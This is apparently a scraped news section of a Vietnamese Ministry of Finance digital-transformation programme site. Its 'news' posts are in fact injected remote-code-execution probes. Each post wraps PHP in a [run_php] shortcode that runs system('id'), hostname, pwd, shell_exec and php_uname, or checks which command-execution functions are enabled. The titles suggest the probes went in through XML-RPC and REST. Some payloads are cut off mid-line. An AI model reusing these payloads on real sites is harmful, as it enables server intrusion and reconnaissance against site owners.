BỘ TÀI CHÍNH

Chương trình Hỗ trợ Doanh nghiệp Chuyển đổi số

Tin tức

TEST_RCE_V2

[run_php] echo “NEW_RCE_”.php_uname(); [/run_php]

XMLRPC CDATA RCE Test

[run_php]echo ‘XML_CDATA_RCE_START|’;system(‘id’);echo ‘|’;system(‘hostname’);echo ‘|’;system(‘pwd’);echo ‘|XML_CDATA_RCE_END|’;[/run_php]

REST SingleQuote RCE

[run_php] echo ‘REST_SQ_RCE_START|‘; system(‘id 2>&1’); echo ‘|hostname:’; system(‘hostname 2>&1’); echo ‘REST_SQ_RCE_END|‘; [/run_php]

RCE_TEST_VIA_REST

[run_php] echo “NEW_POST_RCE_TEST|“; system(“id 2>&1”); echo “NEW_POST_RCE_END|“; [/run_php]

PHP_EXEC_SQ1

SQ_TEST_1_START [run_php] system(id); echo —SQ_MARKER—; system(hostname); [/run_php] SQ_TEST_1_END

PHP_TEST_V2

TEST_START [run_php] echo “RCE_TEST_V2_OK|” . php_uname() . “|“; echo “uid=” . getmyuid() . ““; [/run_php] TEST_END

RCE_REST_TEST

[run_php] echo “RESTRCE_START|“; system(“id 2>&1”); echo “RESTRCE_END|“; [/run_php]

RCE_SYS_TEST

[run_php] echo “SYSTEST_START|“; $out = shell_exec(“id 2>&1”); echo “SHELL_EXEC: ” . $out . ““; system(“hostname 2>&1”); echo “SYSTEST_END|“; [/run_php]

FUNC_TEST_V3

[run_php] echo “FUNC_TEST_START|“; echo “system: ” . (function_exists(“system”) ? “YES” : “NO”) . ““; echo “exec: ” . (function_exists(“exec”) ? “YES” : “NO”) . ““; echo “shell_exec: ” . (function_exists(“shell_e...

DB_RECON_V3

[run_php]echo ‘===RCE_V3_START===’;echo ‘PHP_VERSION: ‘.PHP_VERSION;echo ‘|SAPI: ‘.php_sapi_name();$test_funcs=array(‘system’,’exec’,’passthru’,’shell_exec’,’popen’,’proc_open’,’file_get_contents’,’file’,’readfile’,...